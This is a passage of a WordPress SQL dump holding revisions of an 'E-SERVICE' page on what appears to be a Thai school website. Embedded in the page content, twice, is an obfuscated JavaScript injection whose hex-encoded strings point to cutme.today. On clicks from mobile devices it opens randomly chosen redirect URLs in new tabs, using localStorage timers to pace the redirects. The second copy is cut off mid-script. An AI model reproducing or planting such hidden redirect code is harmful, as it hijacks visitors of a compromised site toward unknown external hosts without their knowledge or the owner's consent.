wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-03 11:42:32','2025-07-03 04:42:32','',459,'http://pakhaeng.ssk.in.th/?p=1645',0,'revision','',0),
(1647,1,'2025-07-03 11:44:39','2025-07-03 04:44:39','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:embed {\"url\":\"https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\",\"type\":\"rich\",\"providerNameSlug\":\"canva\",\"align\":\"left\"} -->\n<figure class=\"wp-block-embed alignleft is-type-rich is-provider-canva wp-block-embed-canva\"><div class=\"wp-block-embed__wrapper\">\nhttps://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":1638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ๆฟ-1024x256.png\" alt=\"\" class=\"wp-image-1638\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 